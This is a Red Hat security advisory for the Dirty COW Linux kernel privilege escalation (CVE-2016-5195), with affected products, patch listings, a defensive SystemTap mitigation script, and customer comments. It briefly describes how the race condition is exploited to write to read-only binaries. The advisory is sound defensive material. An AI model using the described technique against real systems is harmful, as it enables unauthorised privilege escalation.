Kernel Local Privilege Escalation "Dirty COW" - CVE-2016-5195

Public Date: October 19, 2016, 12:00 am
Updated -
Resolved Status
Important Impact

Red Hat Product Security has been made aware of a vulnerability in the Linux kernel that has been assigned CVE-2016-5195. This issue was publicly disclosed on October 19, 2016 and has been rated as Important. This issue is being refered to as "Dirty COW" in the media.

Background Information

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

This could be abused by an attacker to modify existing setuid files with instructions to elevate privileges. An exploit using this technique has been found in the wild. This flaw affects most modern Linux distributions.

Red Hat Product Security has rated this update as having a security impact of Important.

Impacted Products

The following Red Hat Product versions are impacted:

  • Red Hat Enterprise Linux 5
  • Red Hat Enterprise Linux 6
  • Red Hat Enterprise Linux 7
  • Red Hat Enterprise MRG 2
  • Red Hat Openshift Online v2
  • Red Hat Virtualization (RHEV-H/RHV-H)

Attack Description and Impact

This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set. This is achieved by racing the madvise(MADV_DONTNEED) system call while having the page of the executable mmapped in memory.

Diagnose your vulnerability

Determine if your system is vulnerable


Take Action

All Red Hat customers running the affected versions of the kernel are strongly recommended to update the kernel as soon as patches are available. Details about impacted packages as well as recommended mitigation are noted below. A system reboot is required in order for the kernel update to be applied.

Updates for Affected Products

The fixes for CVE-2016-5195 were included in the recent release of Red Hat Enterprise Linux 7.3.

A kpatch for customers running Red Hat Enterprise Linux 7.2 or greater will be available. Please open a support case to gain access to the kpatch.

For more details about what a kpatch is: Is live kernel patching (kpatch) supported in RHEL 7?


ProductPackageAdvisory/Update
Red Hat Enterprise Linux 7kernelRHSA-2016:2098
Red Hat Enterprise Linux 7kernel-rtRHSA-2016:2110
Red Hat Enterprise Linux 7.1 Extended Update Support*kernelRHSA-2016:2118
Red Hat Enterprise Linux 6kernelRHSA-2016:2105
Red Hat Enterprise Linux 6.7 Extended Update Support*kernelRHSA-2016:2106
Red Hat Enterprise Linux 6.6 Advanced Update Support**kernelRHSA-2016:2128
Red Hat Enterprise Linux 6.5 Advanced Update Support**kernelRHSA-2016:2120
Red Hat Enterprise Linux 6.4 Advanced Update Support**kernelRHSA-2016:2133
Red Hat Enterprise Linux 6.2 Advanced Update Support**kernelRHSA-2016:2132
Red Hat Enterprise Linux 5kernelRHSA-2016:2124
Red Hat Enterprise Linux 5.9 Advanced Update Support**kernelRHSA-2016:2126
Red Hat Enterprise Linux 5.6 Advanced Update Support**kernelRHSA-2016:2127
RHEL Atomic Hostkernelimages respun on 3Nov2016
Red Hat Enterprise MRG 2kernel-rtRHSA-2016:2107
Red Hat Virtualization (RHEV-H/RHV-H)kernelpending

*An active EUS subscription is required for access to this patch.

Please contact Red Hat sales or your specific sales representative for more information if your account does not have an active EUS subscription.

What is the Red Hat Enterprise Linux Extended Update Support Subscription?

**An active AUS subscription is required for access to this patch in RHEL AUS.

Mitigation

Red Hat Support supplies mitigations like SystemTap scripts as a stop-gap until official patches are released.  SystemTap scripts are only supported for 30 days after the GA release of the final patches.

HOW TO BUILD AND USE THE SYSTEMTAP WORKAROUND

The systemtap countermeasure involves creating a kernel module (like a driver) using a systemtap script that intercepts the vulnerable system call. It is used as a stopgap solution until a fixed kernel is booted into the affected machine. This solution does not require a reboot and applies to RHEL 5, 6 and 7.

It is not possible to make a module that applies to all kernels. Not even for a family (i.e., All RHEL5, 6 or 7). Each specific kernel version requires a .ko generated for that given kernel (uname -r).

REQUIREMENTS

In order to build the systemtap module, the following packages are required:

  • systemtap-client
  • systemtap-devel
  • gcc (and dependencies)
  • kernel-devel-`uname -r`
  • kernel-debuginfo-`uname -r`
  • kernel-debuginfo-common-`uname -r`

WARNING: The 'kernel' packages requires the same version as the running kernel. Downloading the latest version will prevent systemtap for working. Please download the exact running version.


WHERE DO I GET THE DEBUGINFOS

Please refer to KB https://access.redhat.com/solutions/9907


HOW DO I BUILD THE MODULE

1. After you installed the packages, create a file named dirtycow.stp with this content:

probe kernel.function("mem_write").call ? {
        $count = 0
}

probe syscall.ptrace {  // includes compat ptrace as well
        $request = 0xfff
}

probe begin {
        printk(0, "CVE-2016-5195 mitigation loaded")
}


probe end {
        printk(0, "CVE-2016-5195 mitigation unloaded")
}
										

2. Save the file. Compile it using this command:

# stap -g -p 4 -m dirtycow_`uname -r|tr -cd [:digit:]` dirtycow.stp
dirtycow_26183985.ko
											

In the above example, the .ko file has a number identifying its kernel version. In that case, it is 2.6.18-398.el5. This module can be used in other systems with this exact kernel version without having to install the debuginfo and development packages, needing only systemtap-runtime . Just copy the module file to the server with the same kernel version, install the systemtap-runtime package and proceed from the next step.


3. In order to load the module, run the command staprun -L <.ko file>. For example:

# staprun -L dirtycow_26183985.ko
												

4. Check if is it loaded:

# dmesg | grep CVE-2016-5195
CVE-2016-5195 mitigation loaded
													

5. To unload the module, reboot the system or run the "staprun -A dirtycow_26183985" command and interrupt it with Ctlr+C, as shown below:

# staprun -A dirtycow_26183985
^C
Message from syslogd@...
kernel:CVE-2016-5195 mitigation unloaded
														

IMPORTANT

  • The module does not survive a boot: It is not reloaded after a system boot.
  • After a reboot, the module must be manually loaded again.
  • If the kernel is updated or changed, this module won't be loaded into the new kernel.
  • If you booted into a different kernel without the fix, a new compatible module should be loaded.
  • A corrected kernel does not need the module load.

Please reference bug 1384344 for detailed mitigation steps.

27 Comments

Subscriber exclusive content

A Red Hat subscription provides unlimited access to our knowledgebase of over 48,000 articles and solutions.

Current Customers and Partners

Log in for full access

Log In

Updated RHEL 6 kernel package is now available (kernel-2.6.32-642.6.2.el6.x86_64.rpm)

Hi, Our server is running this version : uname -r 2.6.32-573.el6.x86_64 cat /etc/redhat-release Red Hat Enterprise Linux Server release 6.7 (Santiago) Do we need to go for : RHEL 6,7 extended support release kernel version i.e. 2.6.32-573.35.2.el6.x86_64? or to "kernel-2.6.32-642.6.2.el6.x86_64.rpm) this version. Could you confirm please.

This is for RHEl6U8 or for all other variants. I could see for RHEL 6U7 kernel-2.6.32-573.35.2.el6.x86_64.rpm given as solution

But this kernel version kernel-2.6.32-573.35.2.el6.x86_64.rpm is only available with Extended Update Support. if you If I don't have EUS and I have an applications that currently is not compatible on 6.8 and I want to avoid patching to 6.8 what can I do?

Is it safe to use the latest kernel package kernel-3.10.0-327.36.3.el7.x86_64.rpm on a RHEL 7.1 system while installing extra dependencies (dracut, systemd, etc..) from newer releases or will there be a separate package for older RHEL7 (7.1/7.0) systems? For now my goal is to keep a system at 7.1 but have the updated kernel.

Your article says its ready for RHEL 6, but its actually not available for download yet?

I'm pulling it down right now -

Any update for RHEL-5?

Hi - The RHEL 5 Errata has been published - details are available at https://rhn.redhat.com/errata/RHSA-2016-2124.html - kernel-2.6.18-416.el5

The link to RHSA-2016:2107 goes to 2016 - typo in the link.

Thank you. I've corrected the link. Regards.

When do you guys show the patch of RHEL 6 at "https://access.redhat.com/labs/psb" ?

Any update for RHEL-5?

Hi - The RHEL 5 Errata has been published - details are available at https://rhn.redhat.com/errata/RHSA-2016-2124.html - kernel-2.6.18-416.el5

Is there something I can audit in auditd (RHEL6) to help detect the possible uses of the exploit while we roll out the patch?

I haven't seen anybody ask about RHEL 4, which is covered under ELS until April, 2017. Should we expect that a patch is forthcoming for this ancient dinosaur, too?

Hi Ben, As noted on page - https://access.redhat.com/security/cve/CVE-2016-5195 - RHEL 4 ELS kernel is not effected by this issue. Regards,

Thanks, Cliff! Don't I feel sheepish... baaaah. :)

Any Update for RHEL-6

Hi, the main RHEL 6 kernel was fixed last week within Errata RHSA-2016:2105 (2016-10-25) - kernel-2.6.32-642.6.2.el6 . Details are here - http://rhn.redhat.com/errata/RHSA-2016-2105.html.

The Resolve tab of this article has links to all available variations of RHEL 6, including 6.6 and 6.7 EUS versions.

Regards.

Hi,

The new kernel releases are listed for RH 5.X and 6.X but I can't tell how to DL the actual RPM's. "(The unlinked packages above are only available from the Red Hat Network)", when login in to RH portal, I can't find from where can I DL the RPM's.

Another question: Can these kernels be use for CentOS as well?

Thanks

The package named for the mitigation step is different on RHEL5 to RHEL6 and RHEL7 on an x86_64 system.

On RHEL5, one would install the following for a specific kernel to be matched: yum install -y systemtap-client systemtap-devel gcc kernel-$1 kernel-devel-$1 kernel-debuginfo-$1 kernel-debuginfo-common-$1

On RHEL6 or RHEL7, one would install: yum install -y systemtap-client systemtap-devel gcc kernel-$1 kernel-devel-$1 kernel-debuginfo-$1 kernel-debuginfo-common-x86_64-$1

where $1 is equivalent to uname -r in the instructions above.

My kernal versions are 2.6.32-431.el6.x86_64, 2.6.32-573.el6.x86_64. i unable to download the fixes. Can anyone help me out..?

Hello, If you are having issues downloading packages then you might not have access with your customer portal account or not have the required entitlements. You can open a support case via the customer portal or use: https://access.redhat.com/support/contact/technicalSupport for assistance.

Having to update all my 6.5 Kernels :) which would need booting each one once updated , I have installed the suggested "Kernel Module " option as a way to apply some sort of "fix" to the problem. That of course included all steps described : https://access.redhat.com/security/vulnerabilities/DirtyCow?page=1 under section: Mitigation HOW TO BUILD AND USE THE SYSTEMTAP WORKAROUND I have just followed the suggested steps and compiled the "ready made kernel module" and loaded it into the each machine's kernel. Of course the compiled module could be copied to another 6.5 kernel machine and get loaded there .

Are older 2.4.x kernels of RHEL 3 also affected.?

Hi I have problem with download wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_2.sh

Pages